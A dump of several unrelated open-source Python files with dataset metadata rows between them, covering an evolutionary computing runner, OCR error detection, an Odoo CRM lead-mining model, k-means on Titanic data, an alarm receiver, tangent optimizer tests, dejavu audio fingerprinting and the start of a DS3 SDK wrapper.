self._socket.sendto(b"\x08OK", addr)
except OSError as ex:
if ex.errno == socket.EWOULDBLOCK:
pass
else:
self._logger.critical(ex)
raise ex
except Exception as ex:
self._logger.critical(ex)
raise ex
| gpl-3.0 | -7,447,576,450,279,924,000 | 31.421053 | 87 | 0.523268 | false | 3.882353 | false | false | false |
rossweinstein/Evolutionary-Computing-Python | src/main/Main.py | 1 | 1131 | from src.ecSystem.ECSystem import ECSystem
from src.ecSystem.ECSystemParameters import ECSystemParameters
# Where we actually run our EC System
params = ECSystemParameters()
# Governs the number of expressions in each generation
params.generation_size = 200
# Governs the length of the expressions in the initial population
params.genome_size = 15
# The percentage of the population selected for the next generation
params.fitness_threshold = 0.2
# If our fitness is not improving over this set number of generations, the EC System reboots
params.stagnation_threshold = 30
# The percentage of the population selected for mutation
params.mutation_percentage = .1
# Minimum fitness value required for the system to deem the expression equivalent to training data
params.success_threshold = 0.01
# Trainging Data: The x and y values used to evaluate the expression's fitness
params.x_training_data = [-55.0, -35.0, -11.0, -1.0, 1.0, 19.0, 87.0, 101.0]
params.y_training_data = [1512.0, 612.0, 60, 0.0, 0.0, 180.0, 3784, 5100.0]
ec_system = ECSystem(params)
ec_system.run_ec_system()
# System results
print(ec_system.stats)
| mit | 5,219,184,992,717,285,000 | 32.264706 | 98 | 0.769231 | false | 3.25 | false | false | false |
tung18tht/ICDAR-2017-Post-OCR-Correction | errors_detection/find_suspicious_eng_words.py | 1 | 1754 | import os, linecache, re, json
work_directory_path = os.path.dirname(os.path.realpath(__file__))
eng_words_file = open(work_directory_path + "/eng_words.txt", "rU")
eng_words = set()
for word in eng_words_file:
eng_words |= {word.rstrip()}
data_directory_path = work_directory_path + "/ICDAR2017_datasetPostOCR_Evaluation_2M_v1.2"
eng_data_directory_paths = [data_directory_path + "/eng_monograph", data_directory_path + "/eng_periodical"]
output_file = open(work_directory_path + "/Results/result_eng_words.json", "w")
output_file.write("{")
for eng_data_directory_path in eng_data_directory_paths:
for root_path, directories, files in os.walk(eng_data_directory_path):
for file in files:
if os.path.splitext(file)[1] == ".txt":
output_file.write("\n \""+os.path.basename(root_path)+"/"+file+"\": ")
errors = {}
file_path = root_path + "/" + file
ocr_output = linecache.getline(file_path, 1)[14:].strip()
word_begin_index = 0
for i, character in enumerate(ocr_output):
if character == ' ':
word_end_index = i
clean_word = re.sub('\W+', '', ocr_output[word_begin_index:word_end_index].lower())
if clean_word not in eng_words:
errors[str(word_begin_index)+":1"] = {}
word_begin_index = word_end_index + 1
clean_word = re.sub('\W+', '', ocr_output[word_begin_index:].lower())
if clean_word not in eng_words:
errors[str(word_begin_index)+":1"] = {}
output_file.write(json.dumps(errors, indent=8)+",")
output_file.seek(0, 2)
output_file.truncate(output_file.tell() - 1)
output_file = open(work_directory_path + "/Results/result_eng_words.json", "a")
output_file.write("\n}") | mit | 7,360,763,077,504,529,000 | 36.340426 | 108 | 0.622007 | false | 3.137746 | false | false | false |
loli/medpy | doc/numpydoc/numpydoc/comment_eater.py | 1 | 5357 |
import sys
if sys.version_info[0] >= 3:
from io import StringIO
else:
from io import StringIO
import compiler
import inspect
import textwrap
import tokenize
from .compiler_unparse import unparse
class Comment(object):
""" A comment block.
"""
is_comment = True
def __init__(self, start_lineno, end_lineno, text):
# int : The first line number in the block. 1-indexed.
self.start_lineno = start_lineno
# int : The last line number. Inclusive!
self.end_lineno = end_lineno
# str : The text block including '#' character but not any leading spaces.
self.text = text
def add(self, string, start, end, line):
""" Add a new comment line.
"""
self.start_lineno = min(self.start_lineno, start[0])
self.end_lineno = max(self.end_lineno, end[0])
self.text += string
def __repr__(self):
return '%s(%r, %r, %r)' % (self.__class__.__name__, self.start_lineno,
self.end_lineno, self.text)
class NonComment(object):
""" A non-comment block of code.
"""
is_comment = False
def __init__(self, start_lineno, end_lineno):
self.start_lineno = start_lineno
self.end_lineno = end_lineno
def add(self, string, start, end, line):
""" Add lines to the block.
"""
if string.strip():
# Only add if not entirely whitespace.
self.start_lineno = min(self.start_lineno, start[0])
self.end_lineno = max(self.end_lineno, end[0])
def __repr__(self):
return '%s(%r, %r)' % (self.__class__.__name__, self.start_lineno,
self.end_lineno)
class CommentBlocker(object):
""" Pull out contiguous comment blocks.
"""
def __init__(self):
# Start with a dummy.
self.current_block = NonComment(0, 0)
# All of the blocks seen so far.
self.blocks = []
# The index mapping lines of code to their associated comment blocks.
self.index = {}
def process_file(self, file):
""" Process a file object.
"""
if sys.version_info[0] >= 3:
nxt = file.__next__
else:
nxt = file.__next__
for token in tokenize.generate_tokens(nxt):
self.process_token(*token)
self.make_index()
def process_token(self, kind, string, start, end, line):
""" Process a single token.
"""
if self.current_block.is_comment:
if kind == tokenize.COMMENT:
self.current_block.add(string, start, end, line)
else:
self.new_noncomment(start[0], end[0])
else:
if kind == tokenize.COMMENT:
self.new_comment(string, start, end, line)
else:
self.current_block.add(string, start, end, line)
def new_noncomment(self, start_lineno, end_lineno):
""" We are transitioning from a noncomment to a comment.
"""
block = NonComment(start_lineno, end_lineno)
self.blocks.append(block)
self.current_block = block
def new_comment(self, string, start, end, line):
""" Possibly add a new comment.
Only adds a new comment if this comment is the only thing on the line.
Otherwise, it extends the noncomment block.
"""
prefix = line[:start[1]]
if prefix.strip():
# Oops! Trailing comment, not a comment block.
self.current_block.add(string, start, end, line)
else:
# A comment block.
block = Comment(start[0], end[0], string)
self.blocks.append(block)
self.current_block = block
def make_index(self):
""" Make the index mapping lines of actual code to their associated
prefix comments.
"""
for prev, block in zip(self.blocks[:-1], self.blocks[1:]):
if not block.is_comment:
self.index[block.start_lineno] = prev
def search_for_comment(self, lineno, default=None):
""" Find the comment block just before the given line number.
Returns None (or the specified default) if there is no such block.
"""
if not self.index:
self.make_index()
block = self.index.get(lineno, None)
text = getattr(block, 'text', default)
return text
def strip_comment_marker(text):
""" Strip # markers at the front of a block of comment text.
"""
lines = []
for line in text.splitlines():
lines.append(line.lstrip('#'))
text = textwrap.dedent('\n'.join(lines))
return text
def get_class_traits(klass):
""" Yield all of the documentation for trait definitions on a class object.
"""
# FIXME: gracefully handle errors here or in the caller?
source = inspect.getsource(klass)
cb = CommentBlocker()
cb.process_file(StringIO(source))
mod_ast = compiler.parse(source)
class_ast = mod_ast.node.nodes[0]
for node in class_ast.code.nodes:
# FIXME: handle other kinds of assignments?
if isinstance(node, compiler.ast.Assign):
name = node.nodes[0].name
rhs = unparse(node.expr).strip()
doc = strip_comment_marker(cb.search_for_comment(node.lineno, default=''))
yield name, rhs, doc
| gpl-3.0 | -5,297,312,438,764,370,000 | 30.698225 | 86 | 0.581296 | false | 3.953506 | false | false | false |
jeremiahyan/odoo | addons/crm_iap_lead/models/crm_iap_lead_mining_request.py | 1 | 15651 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import logging
from odoo import api, fields, models, _
from odoo.addons.iap.tools import iap_tools
from odoo.exceptions import UserError
_logger = logging.getLogger(__name__)
DEFAULT_ENDPOINT = 'https://iap-services.odoo.com'
MAX_LEAD = 200
MAX_CONTACT = 5
CREDIT_PER_COMPANY = 1
CREDIT_PER_CONTACT = 1
class CRMLeadMiningRequest(models.Model):
_name = 'crm.iap.lead.mining.request'
_description = 'CRM Lead Mining Request'
def _default_lead_type(self):
if self.env.user.has_group('crm.group_use_lead'):
return 'lead'
else:
return 'opportunity'
def _default_country_ids(self):
return self.env.user.company_id.country_id
name = fields.Char(string='Request Number', required=True, readonly=True, default=lambda self: _('New'), copy=False)
state = fields.Selection([('draft', 'Draft'), ('error', 'Error'), ('done', 'Done')], string='Status', required=True, default='draft')
# Request Data
lead_number = fields.Integer(string='Number of Leads', required=True, default=3)
search_type = fields.Selection([('companies', 'Companies'), ('people', 'Companies and their Contacts')], string='Target', required=True, default='companies')
error_type = fields.Selection([
('credits', 'Insufficient Credits'),
('no_result', 'No Result'),
], string='Error Type', readonly=True)
# Lead / Opportunity Data
lead_type = fields.Selection([('lead', 'Leads'), ('opportunity', 'Opportunities')], string='Type', required=True, default=_default_lead_type)
display_lead_label = fields.Char(compute='_compute_display_lead_label')
team_id = fields.Many2one(
'crm.team', string='Sales Team', ondelete="set null",
domain="[('use_opportunities', '=', True)]", readonly=False, compute='_compute_team_id', store=True)
user_id = fields.Many2one('res.users', string='Salesperson', default=lambda self: self.env.user)
tag_ids = fields.Many2many('crm.tag', string='Tags')
lead_ids = fields.One2many('crm.lead', 'lead_mining_request_id', string='Generated Lead / Opportunity')
lead_count = fields.Integer(compute='_compute_lead_count', string='Number of Generated Leads')
# Company Criteria Filter
filter_on_size = fields.Boolean(string='Filter on Size', default=False)
company_size_min = fields.Integer(string='Size', default=1)
company_size_max = fields.Integer(default=1000)
country_ids = fields.Many2many('res.country', string='Countries', default=_default_country_ids)
state_ids = fields.Many2many('res.country.state', string='States')
available_state_ids = fields.One2many('res.country.state', compute='_compute_available_state_ids',
help="List of available states based on selected countries")
industry_ids = fields.Many2many('crm.iap.lead.industry', string='Industries')
# Contact Generation Filter
contact_number = fields.Integer(string='Number of Contacts', default=10)
contact_filter_type = fields.Selection([('role', 'Role'), ('seniority', 'Seniority')], string='Filter on', default='role')
preferred_role_id = fields.Many2one('crm.iap.lead.role', string='Preferred Role')
role_ids = fields.Many2many('crm.iap.lead.role', string='Other Roles')
seniority_id = fields.Many2one('crm.iap.lead.seniority', string='Seniority')
# Fields for the blue tooltip
lead_credits = fields.Char(compute='_compute_tooltip', readonly=True)
lead_contacts_credits = fields.Char(compute='_compute_tooltip', readonly=True)
lead_total_credits = fields.Char(compute='_compute_tooltip', readonly=True)
@api.depends('lead_type', 'lead_number')
def _compute_display_lead_label(self):
selection_description_values = {
e[0]: e[1] for e in self._fields['lead_type']._description_selection(self.env)}
for request in self:
lead_type = selection_description_values[request.lead_type]
request.display_lead_label = '%s %s' % (request.lead_number, lead_type)
@api.onchange('lead_number', 'contact_number')
def _compute_tooltip(self):
for record in self:
company_credits = CREDIT_PER_COMPANY * record.lead_number
contact_credits = CREDIT_PER_CONTACT * record.contact_number
total_contact_credits = contact_credits * record.lead_number
record.lead_contacts_credits = _("Up to %d additional credits will be consumed to identify %d contacts per company.") % (contact_credits*company_credits, record.contact_number)
record.lead_credits = _('%d credits will be consumed to find %d companies.') % (company_credits, record.lead_number)
record.lead_total_credits = _("This makes a total of %d credits for this request.") % (total_contact_credits + company_credits)
@api.depends('lead_ids.lead_mining_request_id')
def _compute_lead_count(self):
if self.ids:
leads_data = self.env['crm.lead'].read_group(
[('lead_mining_request_id', 'in', self.ids)],
['lead_mining_request_id'], ['lead_mining_request_id'])
else:
leads_data = []
mapped_data = dict(
(m['lead_mining_request_id'][0], m['lead_mining_request_id_count'])
for m in leads_data)
for request in self:
request.lead_count = mapped_data.get(request.id, 0)
@api.depends('user_id', 'lead_type')
def _compute_team_id(self):
""" When changing the user, also set a team_id or restrict team id
to the ones user_id is member of. """
for mining in self:
# setting user as void should not trigger a new team computation
if not mining.user_id:
continue
user = mining.user_id
if mining.team_id and user in mining.team_id.member_ids | mining.team_id.user_id:
continue
team_domain = [('use_leads', '=', True)] if mining.lead_type == 'lead' else [('use_opportunities', '=', True)]
team = self.env['crm.team']._get_default_team_id(user_id=user.id, domain=team_domain)
mining.team_id = team.id
@api.depends('country_ids')
def _compute_available_state_ids(self):
""" States for some specific countries should not be offered as filtering options because
they drastically reduce the amount of IAP reveal results.
For example, in Belgium, only 11% of companies have a defined state within the
reveal service while the rest of them have no state defined at all.
Meaning specifying states for that country will yield a lot less results than what you could
expect, which is not the desired behavior.
Obviously all companies are active within a state, it's just a lack of data in the reveal
service side.
To help users create meaningful iap searches, we only keep the states filtering for several
whitelisted countries (based on their country code).
The complete list and reasons for this change can be found on task-2471703. """
for lead_mining_request in self:
countries = lead_mining_request.country_ids.filtered(lambda country:
country.code in iap_tools._STATES_FILTER_COUNTRIES_WHITELIST)
lead_mining_request.available_state_ids = self.env['res.country.state'].search([
('country_id', 'in', countries.ids)
])
@api.onchange('available_state_ids')
def _onchange_available_state_ids(self):
self.state_ids -= self.state_ids.filtered(
lambda state: (state._origin.id or state.id) not in self.available_state_ids.ids
)
@api.onchange('lead_number')
def _onchange_lead_number(self):
if self.lead_number <= 0:
self.lead_number = 1
elif self.lead_number > MAX_LEAD:
self.lead_number = MAX_LEAD
@api.onchange('contact_number')
def _onchange_contact_number(self):
if self.contact_number <= 0:
self.contact_number = 1
elif self.contact_number > MAX_CONTACT:
self.contact_number = MAX_CONTACT
@api.onchange('country_ids')
def _onchange_country_ids(self):
self.state_ids = []
@api.onchange('company_size_min')
def _onchange_company_size_min(self):
if self.company_size_min <= 0:
self.company_size_min = 1
elif self.company_size_min > self.company_size_max:
self.company_size_min = self.company_size_max
@api.onchange('company_size_max')
def _onchange_company_size_max(self):
if self.company_size_max < self.company_size_min:
self.company_size_max = self.company_size_min
def _prepare_iap_payload(self):
"""
This will prepare the data to send to the server
"""
self.ensure_one()
payload = {'lead_number': self.lead_number,
'search_type': self.search_type,
'countries': self.country_ids.mapped('code')}
if self.state_ids:
payload['states'] = self.state_ids.mapped('code')
if self.filter_on_size:
payload.update({'company_size_min': self.company_size_min,
'company_size_max': self.company_size_max})
if self.industry_ids:
# accumulate all reveal_ids (separated by ',') into one list
# eg: 3 records with values: "175,176", "177" and "190,191"
# will become ['175','176','177','190','191']
all_industry_ids = [
reveal_id.strip()
for reveal_ids in self.mapped('industry_ids.reveal_ids')
for reveal_id in reveal_ids.split(',')
]
payload['industry_ids'] = all_industry_ids
if self.search_type == 'people':
payload.update({'contact_number': self.contact_number,
'contact_filter_type': self.contact_filter_type})
if self.contact_filter_type == 'role':
payload.update({'preferred_role': self.preferred_role_id.reveal_id,
'other_roles': self.role_ids.mapped('reveal_id')})
elif self.contact_filter_type == 'seniority':
payload['seniority'] = self.seniority_id.reveal_id
return payload
def _perform_request(self):
"""
This will perform the request and create the corresponding leads.
The user will be notified if he hasn't enough credits.
"""
self.error_type = False
server_payload = self._prepare_iap_payload()
reveal_account = self.env['iap.account'].get('reveal')
dbuuid = self.env['ir.config_parameter'].sudo().get_param('database.uuid')
endpoint = self.env['ir.config_parameter'].sudo().get_param('reveal.endpoint', DEFAULT_ENDPOINT) + '/iap/clearbit/1/lead_mining_request'
params = {
'account_token': reveal_account.account_token,
'dbuuid': dbuuid,
'data': server_payload
}
try:
response = iap_tools.iap_jsonrpc(endpoint, params=params, timeout=300)
if not response.get('data'):
self.error_type = 'no_result'
return False
return response['data']
except iap_tools.InsufficientCreditError as e:
self.error_type = 'credits'
self.state = 'error'
return False
except Exception as e:
raise UserError(_("Your request could not be executed: %s", e))
def _create_leads_from_response(self, result):
""" This method will get the response from the service and create the leads accordingly """
self.ensure_one()
lead_vals_list = []
messages_to_post = {}
for data in result:
lead_vals_list.append(self._lead_vals_from_response(data))
template_values = data['company_data']
template_values.update({
'flavor_text': _("Opportunity created by Odoo Lead Generation"),
'people_data': data.get('people_data'),
})
messages_to_post[data['company_data']['clearbit_id']] = template_values
leads = self.env['crm.lead'].create(lead_vals_list)
for lead in leads:
if messages_to_post.get(lead.reveal_id):
lead.message_post_with_view('iap_mail.enrich_company', values=messages_to_post[lead.reveal_id], subtype_id=self.env.ref('mail.mt_note').id)
# Methods responsible for format response data into valid odoo lead data
@api.model
def _lead_vals_from_response(self, data):
self.ensure_one()
company_data = data.get('company_data')
people_data = data.get('people_data')
lead_vals = self.env['crm.iap.lead.helpers'].lead_vals_from_response(self.lead_type, self.team_id.id, self.tag_ids.ids, self.user_id.id, company_data, people_data)
lead_vals['lead_mining_request_id'] = self.id
return lead_vals
@api.model
def get_empty_list_help(self, help):
help_title = _('Create a Lead Mining Request')
sub_title = _('Generate new leads based on their country, industry, size, etc.')
return '<p class="o_view_nocontent_smiling_face">%s</p><p class="oe_view_nocontent_alias">%s</p>' % (help_title, sub_title)
def action_draft(self):
self.ensure_one()
self.name = _('New')
self.state = 'draft'
def action_submit(self):
self.ensure_one()
if self.name == _('New'):
self.name = self.env['ir.sequence'].next_by_code('crm.iap.lead.mining.request') or _('New')
results = self._perform_request()
if results:
self._create_leads_from_response(results)
self.state = 'done'
if self.lead_type == 'lead':
return self.action_get_lead_action()
elif self.lead_type == 'opportunity':
return self.action_get_opportunity_action()
elif self.env.context.get('is_modal'):
# when we are inside a modal already, we re-open the same record
# that way, the form view is updated and the correct error message appears
# (sadly, there is no way to simply 'reload' a form view within a modal)
return {
'name': _('Generate Leads'),
'res_model': 'crm.iap.lead.mining.request',
'views': [[False, 'form']],
'target': 'new',
'type': 'ir.actions.act_window',
'res_id': self.id,
'context': dict(self.env.context, edit=True, form_view_initial_mode='edit')
}
else:
# will reload the form view and show the error message on top
return False
def action_get_lead_action(self):
self.ensure_one()
action = self.env["ir.actions.actions"]._for_xml_id("crm.crm_lead_all_leads")
action['domain'] = [('id', 'in', self.lead_ids.ids), ('type', '=', 'lead')]
return action
def action_get_opportunity_action(self):
self.ensure_one()
action = self.env["ir.actions.actions"]._for_xml_id("crm.crm_lead_opportunities")
action['domain'] = [('id', 'in', self.lead_ids.ids), ('type', '=', 'opportunity')]
return action
def action_buy_credits(self):
return {
'type': 'ir.actions.act_url',
'url': self.env['iap.account'].get_credits_url(service_name='reveal'),
}
| gpl-3.0 | 4,967,390,844,346,431,000 | 45.580357 | 188 | 0.615104 | false | 3.729092 | false | false | false |
Rocamadour7/ml_tutorial | 05. Clustering/titanic-data-example.py | 1 | 1721 | import numpy as np
from sklearn.cluster import KMeans
from sklearn import preprocessing
import pandas as pd
'''
Pclass Passenger Class (1 = 1st; 2 = 2nd; 3 = 3rd)
survival Survival (0 = No; 1 = Yes)
name Name
sex Sex
age Age
sibsp Number of Siblings/Spouses Aboard
parch Number of Parents/Children Aboard
ticket Ticket Number
fare Passenger Fare (British pound)
cabin Cabin
embarked Port of Embarkation (C = Cherbourg; Q = Queenstown; S = Southampton)
boat Lifeboat
body Body Identification Number
home.dest Home/Destination
'''
df = pd.read_excel('titanic.xls')
df.drop(['body', 'name'], 1, inplace=True)
df.fillna(0, inplace=True)
def handle_non_numerical_data(df):
columns = df.columns.values
for column in columns:
text_digit_vals = {}
def convert_to_int(val):
return text_digit_vals[val]
if df[column].dtype != np.int64 and df[column].dtype != np.float64:
column_contents = df[column].values.tolist()
unique_elements = set(column_contents)
x = 0
for unique in unique_elements:
if unique not in text_digit_vals:
text_digit_vals[unique] = x
x += 1
df[column] = list(map(convert_to_int, df[column]))
return df
df = handle_non_numerical_data(df)
X = np.array(df.drop(['survived'], 1).astype(float))
X = preprocessing.scale(X)
y = np.array(df['survived'])
clf = KMeans(n_clusters=2)
clf.fit(X)
correct = 0
for i in range(len(X)):
predict_me = np.array(X[i].astype(float))
predict_me = predict_me.reshape(-1, len(predict_me))
prediction = clf.predict(predict_me)
if prediction[0] == y[i]:
correct += 1
print(correct/len(X))
| mit | 7,085,823,906,355,869,000 | 26.31746 | 77 | 0.646717 | false | 3.106498 | false | false | false |
scudre/alarm-central-station-receiver | alarm_central_station_receiver/contact_id/callup.py | 1 | 3225 | """
Copyright (2018) Chris Scuderi
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import re
from alarm_central_station_receiver.contact_id import handshake
def calc_checksum(code):
checksum = 0
for digit in code:
# 0 is treated as 10 in the checksum calculation
checksum += int(digit, 16) if digit != '0' else 10
return checksum % 15
def parse_alarm_codes(code_str):
pattern = "([0-9]{4}18[136][0-9abcdef]{8}[0-9abcdef]?(?![0-9]{3}18[136]))"
codes = []
for code in re.split(pattern, code_str):
if not code:
continue
# There seems to be some buggyness with either TigerJet or the alarm system
# when sending the last checksum digit when its above 'c'
if len(code) == 15:
# XXX hack - Tigerjet can't detect the highest DTMF code of 15
if calc_checksum(code) == 0:
code += 'f'
# XXX hack - Tigerjet can't detect the high DTMF code of 14
if calc_checksum(code) == 1:
code += 'e'
if calc_checksum(code) == 2:
code += 'd'
codes.append((code, calc_checksum(code) == 0))
return codes
def collect_alarm_codes(fd):
logging.info("Collecting Alarm Codes")
code_str = ''
# Play the alarm handshake to start getting the codes
with handshake.Handshake():
off_hook, digit = get_phone_status(fd)
while off_hook:
code_str += format(digit, 'x') if digit != -1 else ''
off_hook, digit = get_phone_status(fd)
logging.info("Alarm Hung Up")
logging.info('Code String: %s', code_str)
return code_str
def validate_alarm_call_in(fd, expected):
number = '000'
off_hook, digit = get_phone_status(fd)
if off_hook:
logging.info("Phone Off The Hook")
while off_hook:
if digit != -1:
logging.debug("Digit %d", digit)
number = number[1:] + format(digit, 'x')
logging.debug("Number %s", number)
if number == expected:
logging.info("Alarm Call In Received")
break
off_hook, digit = get_phone_status(fd)
logging.debug("Number %s", number)
if not off_hook:
logging.info("Phone On The Hook")
return number == expected and off_hook
def get_phone_status(fd):
status = bytearray(fd.read(2))
digit = status[0]
if digit < 11:
digit = digit - 1
off_hook = ((status[1] & 0x80) == 0x80)
return (off_hook, digit)
def handle_alarm_calling(fd, number):
codes = []
if validate_alarm_call_in(fd, number):
code_str = collect_alarm_codes(fd)
codes = parse_alarm_codes(code_str)
return codes
| apache-2.0 | 6,096,464,687,842,636,000 | 26.801724 | 83 | 0.613953 | false | 3.698394 | false | false | false |
google/tangent | tests/test_optimization.py | 1 | 2734 | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import gast
import pytest
from tangent import optimization
from tangent import quoting
def test_assignment_propagation():
def f(x):
y = x
z = y
return z
node = quoting.parse_function(f)
node = optimization.assignment_propagation(node)
assert len(node.body[0].body) == 2
def test_dce():
def f(x):
y = 2 * x
return x
node = quoting.parse_function(f)
node = optimization.dead_code_elimination(node)
assert isinstance(node.body[0].body[0], gast.Return)
def test_fixed_point():
def f(x):
y = g(x)
z = h(y)
return x
node = quoting.parse_function(f)
node = optimization.optimize(node)
assert isinstance(node.body[0].body[0], gast.Return)
def test_constant_folding():
def f(x):
x = 1 * x
x = 0 * x
x = x * 1
x = x * 0
x = x * 2
x = 2 * x
x = 2 * 3
x = 1 + x
x = 0 + x
x = x + 1
x = x + 0
x = x + 2
x = 2 + x
x = 2 + 3
x = 1 - x
x = 0 - x
x = x - 1
x = x - 0
x = x - 2
x = 2 - x
x = 2 - 3
x = 1 / x
x = 0 / x
x = x / 1
x = x / 0
x = x / 2
x = 2 / x
x = 2 / 8
x = 1 ** x
x = 0 ** x
x = x ** 1
x = x ** 0
x = x ** 2
x = 2 ** x
x = 2 ** 3
def f_opt(x):
x = x
x = 0
x = x
x = 0
x = x * 2
x = 2 * x
x = 6
x = 1 + x
x = x
x = x + 1
x = x
x = x + 2
x = 2 + x
x = 5
x = 1 - x
x = -x
x = x - 1
x = x
x = x - 2
x = 2 - x
x = -1
x = 1 / x
x = 0 / x
x = x
x = x / 0
x = x / 2
x = 2 / x
x = 0.25
x = 1
x = 0
x = x
x = 1
x = x ** 2
x = 2 ** x
x = 8
node = quoting.parse_function(f)
node = optimization.constant_folding(node)
node_opt = quoting.parse_function(f_opt)
lines = quoting.to_source(node).strip().split('\n')[1:]
lines_opt = quoting.to_source(node_opt).strip().split('\n')[1:]
# In Python 2 integer division could be on, in which case...
if 1 / 2 == 0:
lines_opt[27] = ' x = 0'
assert lines == lines_opt
if __name__ == '__main__':
assert not pytest.main([__file__])
| apache-2.0 | 2,331,356,449,715,369,500 | 18.528571 | 79 | 0.517191 | false | 2.968512 | true | false | false |
huytd/dejavu | dejavu/fingerprint.py | 1 | 6020 | import numpy as np
import matplotlib.mlab as mlab
import matplotlib.pyplot as plt
from scipy.ndimage.filters import maximum_filter
from scipy.ndimage.morphology import (generate_binary_structure,
iterate_structure, binary_erosion)
import hashlib
from operator import itemgetter
IDX_FREQ_I = 0
IDX_TIME_J = 1
######################################################################
# Sampling rate, related to the Nyquist conditions, which affects
# the range frequencies we can detect.
DEFAULT_FS = 44100
######################################################################
# Size of the FFT window, affects frequency granularity
DEFAULT_WINDOW_SIZE = 4096
######################################################################
# Ratio by which each sequential window overlaps the last and the
# next window. Higher overlap will allow a higher granularity of offset
# matching, but potentially more fingerprints.
DEFAULT_OVERLAP_RATIO = 0.5
######################################################################
# Degree to which a fingerprint can be paired with its neighbors --
# higher will cause more fingerprints, but potentially better accuracy.
DEFAULT_FAN_VALUE = 15
######################################################################
# Minimum amplitude in spectrogram in order to be considered a peak.
# This can be raised to reduce number of fingerprints, but can negatively
# affect accuracy.
DEFAULT_AMP_MIN = 10
######################################################################
# Number of cells around an amplitude peak in the spectrogram in order
# for Dejavu to consider it a spectral peak. Higher values mean less
# fingerprints and faster matching, but can potentially affect accuracy.
PEAK_NEIGHBORHOOD_SIZE = 20
######################################################################
# Thresholds on how close or far fingerprints can be in time in order
# to be paired as a fingerprint. If your max is too low, higher values of
# DEFAULT_FAN_VALUE may not perform as expected.
MIN_HASH_TIME_DELTA = 0
MAX_HASH_TIME_DELTA = 200
######################################################################
# If True, will sort peaks temporally for fingerprinting;
# not sorting will cut down number of fingerprints, but potentially
# affect performance.
PEAK_SORT = True
######################################################################
# Number of bits to throw away from the front of the SHA1 hash in the
# fingerprint calculation. The more you throw away, the less storage, but
# potentially higher collisions and misclassifications when identifying songs.
FINGERPRINT_REDUCTION = 20
def fingerprint(channel_samples, Fs=DEFAULT_FS,
wsize=DEFAULT_WINDOW_SIZE,
wratio=DEFAULT_OVERLAP_RATIO,
fan_value=DEFAULT_FAN_VALUE,
amp_min=DEFAULT_AMP_MIN):
"""
FFT the channel, log transform output, find local maxima, then return
locally sensitive hashes.
"""
# FFT the signal and extract frequency components
arr2D = mlab.specgram(
channel_samples,
NFFT=wsize,
Fs=Fs,
window=mlab.window_hanning,
noverlap=int(wsize * wratio))[0]
# apply log transform since specgram() returns linear array
arr2D = 10 * np.log10(arr2D)
arr2D[arr2D == -np.inf] = 0 # replace infs with zeros
# find local maxima
local_maxima = get_2D_peaks(arr2D, plot=False, amp_min=amp_min)
# return hashes
return generate_hashes(local_maxima, fan_value=fan_value)
def get_2D_peaks(arr2D, plot=False, amp_min=DEFAULT_AMP_MIN):
# http://docs.scipy.org/doc/scipy/reference/generated/scipy.ndimage.morphology.iterate_structure.html#scipy.ndimage.morphology.iterate_structure
struct = generate_binary_structure(2, 1)
neighborhood = iterate_structure(struct, PEAK_NEIGHBORHOOD_SIZE)
# find local maxima using our fliter shape
local_max = maximum_filter(arr2D, footprint=neighborhood) == arr2D
background = (arr2D == 0)
eroded_background = binary_erosion(background, structure=neighborhood,
border_value=1)
# Boolean mask of arr2D with True at peaks
detected_peaks = local_max - eroded_background
# extract peaks
amps = arr2D[detected_peaks]
j, i = np.where(detected_peaks)
# filter peaks
amps = amps.flatten()
peaks = zip(i, j, amps)
peaks_filtered = [x for x in peaks if x[2] > amp_min] # freq, time, amp
# get indices for frequency and time
frequency_idx = [x[1] for x in peaks_filtered]
time_idx = [x[0] for x in peaks_filtered]
if plot:
# scatter of the peaks
fig, ax = plt.subplots()
ax.imshow(arr2D)
ax.scatter(time_idx, frequency_idx)
ax.set_xlabel('Time')
ax.set_ylabel('Frequency')
ax.set_title("Spectrogram")
plt.gca().invert_yaxis()
plt.show()
return zip(frequency_idx, time_idx)
def generate_hashes(peaks, fan_value=DEFAULT_FAN_VALUE):
"""
Hash list structure:
sha1_hash[0:20] time_offset
[(e05b341a9b77a51fd26, 32), ... ]
"""
fingerprinted = set() # to avoid rehashing same pairs
if PEAK_SORT:
peaks.sort(key=itemgetter(1))
for i in range(len(peaks)):
for j in range(1, fan_value):
if (i + j) < len(peaks) and not (i, i + j) in fingerprinted:
freq1 = peaks[i][IDX_FREQ_I]
freq2 = peaks[i + j][IDX_FREQ_I]
t1 = peaks[i][IDX_TIME_J]
t2 = peaks[i + j][IDX_TIME_J]
t_delta = t2 - t1
if t_delta >= MIN_HASH_TIME_DELTA and t_delta <= MAX_HASH_TIME_DELTA:
h = hashlib.sha1(
"%s|%s|%s" % (str(freq1), str(freq2), str(t_delta)))
yield (h.hexdigest()[0:FINGERPRINT_REDUCTION], t1)
# ensure we don't repeat hashing
fingerprinted.add((i, i + j))
| mit | -8,347,237,291,707,981,000 | 36.391304 | 148 | 0.589535 | false | 3.886378 | false | false | false |
chanchett/ds3_python_sdk_ | ds3/ds3.py | 1 | 30418 | # Copyright 2014-2015 Spectra Logic Corporation. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use
# this file except in compliance with the License. A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file.
# This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
from ctypes import *
import libds3
def checkExistence(obj, wrapper = lambda ds3Str: ds3Str.contents.value):
if obj:
return wrapper(obj)
else:
return None
def arrayToList(array, length, wrapper = lambda ds3Str: ds3Str.contents.value):
result = []
for i in xrange(0, length):
result.append(wrapper(array[i]))
return result
class Ds3Error(Exception):
def __init__(self, libds3Error):
self.reason = libds3Error.contents.message.contents.value
response = libds3Error.contents.error
self._hasResponse = False
